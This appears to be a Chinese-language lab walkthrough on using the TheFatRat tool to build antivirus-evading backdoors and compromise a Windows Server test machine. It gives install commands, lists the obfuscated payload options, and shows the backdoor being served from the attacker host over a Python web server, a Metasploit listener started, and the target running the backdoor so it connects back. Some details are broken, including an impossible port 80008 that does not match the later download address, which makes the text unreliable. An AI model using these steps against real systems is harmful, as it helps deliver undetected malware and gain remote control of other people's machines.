14、TheFatRat木马生成工具-创建后门或payload

kail攻击主机： Kali 192.168.11.106

靶机：windows server 2008 r2  192.168.11.134  x64 32位

 

一、TheFatRat介绍

TheFatRat创建的后门或者payload，可以在Linux，Windows，Mac和Android上等多种平台上执行，可生成exe、apk、sh、bat、py等多种格式。TheFatRat可以和msf无缝对接，并且集成内置了Fudwin、Avoid、backdoor-factory等多个免杀工具，对powershell的免杀姿势尤其多样。

 

特征：

• 全自动MSFvenom & Metasploit。
• 本地或远程侦听器生成。
• 按类别轻松制作后门操作系统。
• 生成各种格式的有效载荷。
• 绕过防病毒后门。
• 可以用于增加文件大小的文件泵。
• 能够检测外部IP和接口地址。
• 自动创建用于USB/CDROM利用的AutoRun文件。

 

二、kail机器安装TheFatRat

1、git clone https://github.com/Screetsec/TheFatRat.git

2、apt install mingw-w64  # 不可少

3、添加执行权限：chmod +x setup.sh powerfull.sh fatrat

4、./setup.py

​

​

​

正在自动完成一些相关的配置：

​

配置输出目录：

​

是否生成快捷方式：

​

​

在成功安装后，可以查看TheFatRat/logs目录下的setup.log文件，里面是TheFatRat需要的一些软件和环境：

​

作者提供了升级的命令，可直接升级软件：

./update && chmod + x setup.sh && ./setup.sh

 

三、使用TheFatRat

3.1、常用创建后门菜单

启动：./fatrat

启动过程比较慢，耐心等待，直至出现如下界面：

​

[01]  Create Backdoor with msfvenom：直接利用msf生产后门，基本不能免杀；

[02]  Create Fud 100% Backdoor with Fudwin 1.0：使用Fudwin 1.0创建powershell后门，ps1利用powerstager混淆，从结果来看效果不错；

[03]  Create Fud Backdoor with Avoid v1.2：使用Avoid v1.2创建后门；

[04]  Create Fud Backdoor with backdoor-factory：使用backdoor-factory创建后门；

[05]  Backdooring Original apk [Instagram, Line,etc]：生成安卓使用的apk后门；

[06]  Create Fud Backdoor 1000% with PwnWinds [Excelent]：综合了多种方式，可生成bat、exe、dll、ps1等，可利用c、C#多种语言编译，官方非常推荐，但经尝试免杀效果一般，肯定是被杀软列入特征库了；

[07]  Create Backdoor For Office with Microsploit：生成office类后门；

[08]  Trojan Debian Package For Remote Access [Trodebi]：生成linux后门；

 

3.2、生成后门或payload

在主菜单选择2，进入[02] Create Fud 100% Backdoor with Fudwin 1.0，选择1，利用powerstager混淆，并将powershell编译成exe。

​

​

​

若生成过程报错，去查看TheFatRat/logs目录下的fudwin.log文件，看看什么报错信息。

生成的rc脚本如下：用于后续msf攻击使用

​

生成的后门或者payload如下：

​

 

使用微步在线云沙箱 (threatbook.com) 在线检测样本，结果如下：

​

​

  

3.3、上传后门到靶机

用python打开一个http服务器：

cd /root/Desktop/Fatrat_Generated/

python -m http.server 80008

​

在靶机上访问http://192.168.11.106:14772可下载后门程序：

​

 

3.4、上传后门到靶机

1、靶机上执行3.2节生成的rc脚本：msf6 > resource /root/Desktop/TheFatRat/config/listeners/test1.rc

2、在靶机上执行后门程序test.exe.exe:

​

虽然报错，但可正常上线：

​

 

四、参考

6-2 自动化工具 FatRat介绍与安装_ev_哔哩哔哩_bilibili

6-3 Linux Payload安全测试_ev_哔哩哔哩_bilibili

远控免杀专题(10)-TheFatRat免杀(VT免杀率22/70) - SecPulse.COM | 安全脉搏

微步在线云沙箱 (threatbook.com)  在线检测样本

VirusTotal - Home  在线检测样本